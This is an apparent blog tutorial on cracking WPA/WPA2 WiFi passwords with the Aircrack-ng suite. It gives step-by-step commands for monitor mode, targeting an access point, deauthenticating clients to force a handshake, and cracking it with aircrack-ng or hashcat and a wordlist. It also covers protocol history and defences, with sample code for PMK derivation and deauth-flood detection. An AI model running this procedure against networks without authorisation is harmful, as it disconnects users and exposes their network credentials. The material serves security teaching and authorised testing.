Wireless Attack with Aircrack-ng : A Complete Guide from A to Z
A deep technical dive into WPA handshake capture and WiFi password cracking — for educational and authorized testing purposes only.
Yurichi Tamaki
March 22, 2026 (Updated: March 22, 2026)
Introduction
Wireless network security is one of the most critical topics in cybersecurity. Every day, millions of people connect to WiFi networks without thinking about potential vulnerabilities lurking in the air around them. Aircrack-ng is the industry-standard suite used by penetration testers and security researchers to assess the robustness of WiFi networks.
In this article, we will explore in full technical detail how a wireless attack works against a WPA/WPA2 network — from hardware setup all the way to cracking the captured password.
⚠️ Legal Warning : The techniques presented here must only be used on networks you own or have explicit written authorization to test. Unauthorized use is illegal and may result in criminal prosecution.
1. What is Aircrack-ng?
Aircrack-ng is a complete open-source suite dedicated to WiFi security auditing. It groups together several complementary tools:
airmon-ng — Monitor mode management
airodump-ng — Packet capture and reconnaissance
aireplay-ng — Packet injection and active attacks
aircrack-ng — WEP/WPA/WPA2 cracking
airdecap-ng — Capture decryption
It comes pre-installed on Kali Linux and is compatible with most security-oriented Linux distributions.
2. Understanding WPA/WPA2
Before talking about attacks, you need to understand what you are attacking.
The 4-Way Handshake
When a client connects to a WPA/WPA2 access point, both parties negotiate a session key through a 4-message exchange called the 4-Way Handshake. This exchange uses the PMK (Pairwise Master Key), which is derived from the WiFi password.
Client ←→ Access Point
[1] AP → Client : ANonce (random value)
[2] Client → AP : SNonce + MIC (Message Integrity Code)
[3] AP → Client : Encrypted GTK + MIC
[4] Client → AP : Confirmation
The critical point: the handshake contains enough information to verify offline whether a password is correct — without ever needing to reconnect to the network. This is exactly what Aircrack-ng exploits.
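To make the "derived from the WiFi password" step concrete, here is an added Python example (not code from the original article or from the Aircrack-ng project). It derives the PMK exactly as IEEE 802.11i specifies for WPA/WPA2-Personal: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 32-byte output. It then estimates how long exhausting a given password space takes at a guess rate you supply; the rates used in the sample are assumptions for illustration, in line with the "tens of millions per second" figure given later in the article for GPU cracking.

```python
import hashlib

# Constants fixed by IEEE 802.11i for WPA/WPA2-Personal PMK derivation.
PBKDF2_ITERATIONS = 4096
PMK_LENGTH_BYTES = 32
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).

    The SSID is the salt, so the same passphrase on two differently named
    networks yields two different PMKs. That is why a default or very
    common SSID weakens a network: it lets precomputed tables be reused.
    """
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("utf-8"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LENGTH_BYTES,
    )


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct passwords of a given length over an alphabet."""
    return alphabet_size ** length


def years_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every password, given a sustained guess rate.

    Each guess costs one full PBKDF2 derivation (4096 iterations), which is
    the work factor the standard imposes on the attacker per candidate.
    """
    seconds = keyspace(alphabet_size, length) / guesses_per_second
    return seconds / SECONDS_PER_YEAR


def compare_policies(guesses_per_second: float = 1e7) -> dict:
    """Contrast a short lowercase password with the 20+ random characters
    the article recommends, at an assumed guess rate (default: 10 million/s)."""
    return {
        "8 lowercase letters": years_to_exhaust(26, 8, guesses_per_second),
        "20 printable ASCII chars": years_to_exhaust(95, 20, guesses_per_second),
    }


if __name__ == "__main__":
    # "password" / "IEEE" is the published 802.11i Annex test vector.
    print(derive_pmk("password", "IEEE").hex())
    for policy, years in compare_policies().items():
        print(f"{policy}: {years:.3g} years to exhaust")
```

The point of the comparison is the one the article makes: the protocol's PBKDF2 work factor is fixed, so the only variable under the defender's control is the size of the password space. An 8-character lowercase password is exhausted in hours at the assumed rate; 20 random printable characters would take longer than the age of the universe by many orders of magnitude.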
WPA vs WPA2 vs WPA3 — Differences and Algorithms
To fully understand wireless attacks, you need to understand the evolution of WiFi security protocols and the cryptographic algorithms behind each one.
A Brief History
WiFi security did not start with WPA. The original standard was WEP (Wired Equivalent Privacy), introduced in 1997. It was broken so fundamentally that it can be cracked in minutes today. WPA was introduced as an emergency replacement, and WPA2 followed as the proper long-term solution. WPA3 is the current state of the art.
WEP — Wired Equivalent Privacy (1997) — Broken
Algorithm: RC4 stream cipher
Key size: 40-bit or 104-bit
Authentication: Open System or Shared Key
WEP was the first attempt at WiFi encryption. It uses the RC4 stream cipher with a static key shared between all clients and the access point. The fundamental flaw is that WEP reuses Initialization Vectors (IVs) — short 24-bit values prepended to the key. With enough captured packets, statistical analysis reveals the key entirely. Tools like aircrack-ng can crack WEP in under 5 minutes by collecting around 50,000 to 100,000 packets.
Status: Completely broken. Never use WEP under any circumstances.
WPA — WiFi Protected Access (2003) — Weak
Algorithm: TKIP (Temporal Key Integrity Protocol) built on RC4
Key size: 128-bit per-packet key
Authentication: PSK (Pre-Shared Key) or 802.1X (Enterprise)
Handshake: 4-Way Handshake
WPA was introduced as an urgent patch for WEP while WPA2 was being developed. Instead of replacing RC4 entirely, WPA wraps it in TKIP which generates a new per-packet key using a mixing function. This fixed the IV reuse problem of WEP. However, TKIP itself has known vulnerabilities — the Beck-Tews attack (2008) and the Ohigashi-Morii attack (2009) can partially break TKIP in minutes under certain conditions.
The 4-Way Handshake introduced in WPA is still used in WPA2 and is the basis of the attack described in this article.
Status: Deprecated. Vulnerable to handshake capture + offline dictionary attack. Avoid.
WPA2 — WiFi Protected Access 2 (2004) — Current Standard
Algorithm: AES-CCMP (Advanced Encryption Standard — Counter Mode CBC-MAC Protocol)
Key size: 128-bit
Authentication: PSK or 802.1X (Enterprise)
Handshake: 4-Way Handshake
Optional: TKIP (backward compatibility, not recommended)
WPA2 replaced RC4 and TKIP with AES-CCMP, a fundamentally stronger cipher. AES is a symmetric block cipher adopted as the US federal standard (FIPS 197). CCMP adds message integrity checking on top of AES encryption, preventing both eavesdropping and packet tampering.
WPA2 has two modes:
WPA2-Personal (PSK) — A shared password is used by all clients. This is what home and small office networks use. Vulnerable to offline dictionary attacks on the captured 4-Way Handshake.
WPA2-Enterprise (802.1X) — Each user authenticates individually via a RADIUS server using certificates or credentials. The key is unique per session and per user. Capturing the handshake does not allow offline cracking of individual credentials.
Known vulnerabilities in WPA2-Personal:
KRACK (Key Reinstallation Attack, 2017) — Exploits flaws in the 4-Way Handshake state machine to reinstall an already-used key, allowing decryption and replay of traffic. Patched in most devices.
PMKID Attack (2018) — Allows capturing a single frame from the AP without needing a connected client, enabling offline cracking without waiting for a full handshake.
Offline dictionary attacks on the 4-Way Handshake — The core attack this article covers.
Status: Still widely used. Secure against passive eavesdropping when combined with a strong random password, but fundamentally vulnerable to offline brute-force if the password is weak.
WPA3 — WiFi Protected Access 3 (2018) — Current Best Standard
Algorithm: AES-GCMP-256 (Galois/Counter Mode Protocol, 256-bit)
Authentication: SAE (Simultaneous Authentication of Equals) replaces PSK
Handshake: Dragonfly Handshake (based on Diffie-Hellman)
Forward Secrecy: Yes
Management Frame Protection: Mandatory (802.11w)
WPA3 is a complete redesign of the authentication and key exchange mechanism. It solves the core weakness of WPA2-Personal.
The key innovation is SAE (Simultaneous Authentication of Equals), also called the Dragonfly handshake. Unlike WPA2 which derives the session key directly from the password in a way that can be tested offline, SAE uses a zero-knowledge proof based on Diffie-Hellman key exchange. Even if an attacker captures the entire SAE exchange, they cannot test passwords offline — each guess requires a live interaction with the access point.
WPA3 also introduces Perfect Forward Secrecy (PFS). This means that even if the password is eventually discovered, past captured traffic cannot be decrypted retroactively because each session used a unique key that no longer exists.
WPA3 modes:
WPA3-Personal — Uses SAE instead of PSK. Offline dictionary attacks are impossible. Each password guess requires interacting with the AP, making brute force impractical.
WPA3-Enterprise — Uses 192-bit AES-GCMP-256 with Suite B cryptography (ECDHE, ECDSA). Designed for high-security environments like government and financial institutions.
WPA3-Enhanced Open — Uses OWE (Opportunistic Wireless Encryption) for open networks (cafes, airports). Encrypts traffic even without a password, preventing passive eavesdropping on open hotspots.
Known vulnerabilities in WPA3:
Dragonblood attacks (2019) — Side-channel attacks and downgrade attacks against early WPA3 implementations. Patched in most modern firmware. Require physical proximity and active interaction.
Status: The gold standard. Use WPA3 whenever possible. Immune to the offline handshake cracking attack described in this article.
Side-by-Side Comparison
Protocol — Year — Encryption — Key Exchange — Offline Cracking — Status
WEP — 1997 — RC4 (broken) — Static key — Yes, trivially — Never use
WPA — 2003 — TKIP/RC4 — 4-Way Handshake — Yes, dictionary — Deprecated
WPA2 — 2004 — AES-CCMP 128-bit — 4-Way Handshake — Yes, if weak password — Acceptable with strong password
WPA3 — 2018 — AES-GCMP 256-bit — SAE Dragonfly — No — Recommended
Why This Matters for the Attack
The entire attack described in this article — capturing the 4-Way Handshake and running an offline dictionary attack — works only against WPA and WPA2 Personal. The vulnerability is not in AES itself (which is unbroken), but in the fact that the handshake allows offline verification of password guesses.
WPA3 eliminates this entirely. No captured handshake, no offline cracking. The attacker would need to send live authentication attempts to the access point — slow, noisy, and easily blocked.
This is why upgrading to WPA3 is the single most impactful defense against wireless attacks.
3. Required Hardware
Compatible Wireless Adapter
This is the most critical requirement. Your built-in laptop WiFi card will generally not work. You need an external USB adapter that supports:
Monitor mode — to capture all surrounding packets passively
Packet injection — to send forged frames to force reactions
Recommended chipsets:
Atheros AR9271 — Excellent support, reliable injection, 2.4 GHz
Ralink RT3070 / RT3572 — Good support, dual-band depending on model
MediaTek MT7612U — Dual-band 2.4/5 GHz support
What to avoid:
Realtek RTL8188EUS — Unstable monitor mode, unreliable injection, 2.4 GHz only. The default kernel driver does not properly support aircrack-ng. If you use one anyway, install the out-of-tree driver:
sudo apt install realtek-rtl88xxau-dkms
Then reboot before continuing.
Software
Kali Linux (recommended) or any distribution with aircrack-ng installed
Wordlist: /usr/share/wordlists/rockyou.txt (available on Kali by default)
4. Step 1 — Check Your Interface
Start by identifying your wireless interface:
iwconfig
Example output:
wlan0     IEEE 802.11  Mode:Managed  Frequency:2.472 GHz
          Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
Note your interface name (wlan0 in this example). You will use it in all subsequent commands.
5. Step 2 — Enable Monitor Mode
Kill Interfering Processes
NetworkManager and wpa_supplicant will interfere with monitor mode. Kill them first:
sudo airmon-ng check kill
Enable Monitor Mode
sudo airmon-ng start wlan0
The interface is usually renamed to wlan0mon. Verify with: iwconfig
You should see Mode:Monitor in the output.
Realtek Adapter Problem
Some Realtek adapters (like the RTL8188EUS) do not properly respond to airmon-ng. If your interface still shows Mode:Monitor after running airmon-ng stop, force it manually:
sudo ip link set wlan0 down
sudo iwconfig wlan0 mode managed
sudo ip link set wlan0 up
sudo systemctl restart NetworkManager
6. Step 3 — Reconnaissance with airodump-ng
Scan Nearby Networks
For 2.4 GHz only (basic adapters):
sudo airodump-ng wlan0mon
To scan all bands including 5 GHz (requires a capable adapter):
sudo airodump-ng --band abg wlan0mon
⚠️ Do not use --band abg with a 2.4 GHz-only adapter like the RTL8188EUS. You will get no results at all. Just use the plain command with no --band flag.
Reading the airodump-ng Output
BSSID PWR CH ENC ESSID
AA:BB:CC:DD:EE:FF -45 6 WPA2 MyNetwork
11:22:33:44:55:66 -72 1 WPA2 NeighborWifi
BSSID STATION PWR Frames
AA:BB:CC:DD:EE:FF FF:EE:DD:CC:BB:AA -55 45
Note down for your target:
BSSID: MAC address of the access point (e.g. AA:BB:CC:DD:EE:FF)
CH: Channel number (e.g. 6)
STATION: MAC address of a connected client (e.g. FF:EE:DD:CC:BB:AA)
7. Step 4 — Targeted Handshake Capture
Now that you have identified your target, launch a focused capture:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture_file wlan0mon
-c 6 → Lock onto channel 6
--bssid → Filter only the target AP traffic
-w capture_file → Write the capture to capture_file-01.cap
Leave this command running in a terminal. You are waiting for the message WPA handshake: AA:BB:CC:DD:EE:FF to appear in the top-right corner of the terminal. That confirms the handshake has been captured.
8. Step 5 — Deauthentication Attack
If no client connects naturally, you can force a handshake by kicking an existing client off the network. Open a second terminal while airodump-ng is still running:
sudo aireplay-ng --deauth 1 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA wlan0mon
--deauth 1 → Send 1 deauthentication frame
-a → BSSID of the target access point
-c → MAC address of the target client
The client disconnects and automatically reconnects, triggering the 4-Way Handshake which airodump-ng captures instantly.
Note: Using --deauth 0 sends frames continuously (flood mode). This is more aggressive and much easier to detect by a wireless IDS.
Broadcast Deauth (No Specific Client)
If you cannot identify a specific client MAC, you can deauthenticate everyone on the network:
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
This sends 5 deauth frames to the broadcast address, disconnecting all connected clients simultaneously.
9. Step 6 — Crack the Handshake
Once the handshake is captured in capture_file-01.cap, cracking happens entirely offline — no need to be near the target network anymore:
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture_file-01.cap
Aircrack-ng tests each password from the wordlist by recalculating the MIC and comparing it against the one in the captured handshake. If they match, the password is found.
Speed Up with hashcat (GPU)
For dramatically faster cracking, convert the capture and use hashcat with your GPU:
hcxpcapngtool -o hash.hc22000 capture_file-01.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
A modern GPU can test tens of millions of passwords per second, compared to a few thousand per second on a CPU. For complex passwords this difference is significant.
10. Restore Your Interface
After testing, return the interface to normal managed mode:
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
Verify with iwconfig that the mode is back to Managed.
11. Limitations of the Attack
Physical proximity — You must be within radio range of the target network. Walls and distance significantly degrade signal.
Strong password — A password of 20+ random characters is completely resistant to dictionary attacks. No wordlist will crack it.
WPA3 — Resistant to offline dictionary attacks thanks to the SAE (Simultaneous Authentication of Equals) protocol. The handshake equivalent in WPA3 cannot be cracked offline.
802.11w / MFP (Management Frame Protection) — Deauthentication frames are cryptographically protected, completely blocking the deauth attack described in this article.
Limited chipset — Adapters like the Realtek RTL8188EUS do not support reliable packet injection, making the deauth step unreliable or impossible.
12. Defenses and Counter-Measures
If you manage a WiFi network, here is how to protect it effectively:
Use WPA3 if your devices support it. It is the most resistant standard available today and eliminates offline cracking entirely.
Use a long random password — 20+ characters generated randomly. Use a password manager to store it. This alone defeats all dictionary attacks.
Enable 802.11w (Management Frame Protection) in your router settings. This cryptographically signs management frames and completely blocks deauth flood attacks.
Deploy a WIDS (Wireless Intrusion Detection System) to detect deauth floods, rogue access points, and suspicious scanning activity on your network.
Segment your network — keep IoT devices, guest devices, and critical machines on separate VLANs. A compromised IoT device should not reach your main machines.
Monitor your access point logs regularly for abnormal disconnections, repeated authentication attempts, or unusual client behavior.
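The article notes that flood-mode deauthentication is "much easier to detect by a wireless IDS" and recommends deploying a WIDS. As an added example (not code from the original article or from any WIDS product), here is the core detection logic such a system runs: a sliding-window count of deauthentication and disassociation frames per transmitter address, raising an alert when the count within a window crosses a threshold and noting whether the frames were aimed at the broadcast address (everyone) or at a single client. The frame records, thresholds and MAC addresses below are constructed for the example; a real deployment would feed it frames parsed from a monitor-mode capture.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    """Minimal view of an 802.11 management frame (constructed for this example)."""
    ts: float       # capture timestamp in seconds
    subtype: str    # "deauth", "disassoc", "beacon", "data", ...
    src: str        # transmitter address (the BSSID when an AP sends deauth)
    dst: str        # receiver address (a client, or the broadcast address)


@dataclass
class Alert:
    bssid: str      # address the frames claimed to come from
    start: float
    end: float
    count: int
    broadcast: bool  # True if any frame in the burst targeted all clients


def detect_deauth_floods(frames, window: float = 10.0, threshold: int = 5):
    """Flag bursts of >= threshold deauth/disassoc frames per source within a window.

    A single deauth frame is normal (clients leave, APs time out idle sessions),
    so a threshold is essential to avoid alerting on ordinary churn.
    """
    recent = defaultdict(deque)   # src -> frames still inside the window
    open_alert = {}               # src -> Alert currently being extended
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in ("deauth", "disassoc"):
            continue
        q = recent[f.src]
        q.append(f)
        while f.ts - q[0].ts > window:      # drop frames older than the window
            q.popleft()
        if len(q) < threshold:
            continue
        alert = open_alert.get(f.src)
        if alert is None or f.ts - alert.end > window:
            # New burst: everything currently in the window belongs to it.
            alert = Alert(bssid=f.src, start=q[0].ts, end=f.ts, count=len(q),
                          broadcast=any(x.dst == BROADCAST for x in q))
            open_alert[f.src] = alert
            alerts.append(alert)
        else:
            # Ongoing burst: extend the existing alert instead of spamming.
            alert.end = f.ts
            alert.count += 1
            alert.broadcast = alert.broadcast or f.dst == BROADCAST
    return alerts


AP = "aa:bb:cc:dd:ee:ff"        # constructed BSSID
CLIENT = "11:22:33:44:55:66"    # constructed client MAC

# Constructed trace: one benign deauth, periodic beacons, then a broadcast
# flood of 10 frames and later a 5-frame burst aimed at one client.
SAMPLE_FRAMES = (
    [Frame(0.0, "deauth", AP, CLIENT)]
    + [Frame(float(t), "beacon", AP, BROADCAST) for t in range(0, 300, 30)]
    + [Frame(round(100.0 + 0.1 * i, 1), "deauth", AP, BROADCAST) for i in range(10)]
    + [Frame(round(200.0 + 0.1 * i, 1), "deauth", AP, CLIENT) for i in range(5)]
)


def run_sample():
    """Run the detector over the constructed trace and return its alerts."""
    return detect_deauth_floods(SAMPLE_FRAMES)


if __name__ == "__main__":
    for a in run_sample():
        kind = "broadcast" if a.broadcast else "targeted"
        print(f"{a.bssid}: {a.count} deauth frames, {kind}, "
              f"t={a.start:.1f}..{a.end:.1f}s")
```

Two design points matter in practice. First, the source address in a deauth frame is whatever the sender put there, so an alert names the BSSID being impersonated, not the attacker; locating the real transmitter needs signal-strength data from several sensors. Second, once 802.11w is enabled on the network, forged deauth frames fail integrity checking at the clients, so the same flood becomes a detection signal without causing disconnections.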
Conclusion
Aircrack-ng remains the gold standard tool for wireless penetration testing. The full attack chain — monitor mode, reconnaissance, deauthentication, handshake capture, offline cracking — perfectly illustrates why WPA2 with a weak password is still a serious vulnerability in 2026.
The best defense is a combination of WPA3, Management Frame Protection (802.11w), and a strong random password. These three together make the attack described in this article practically impossible to execute.
#cybersecurity #networking #wifi-security #ethical-hacking #bug-bounty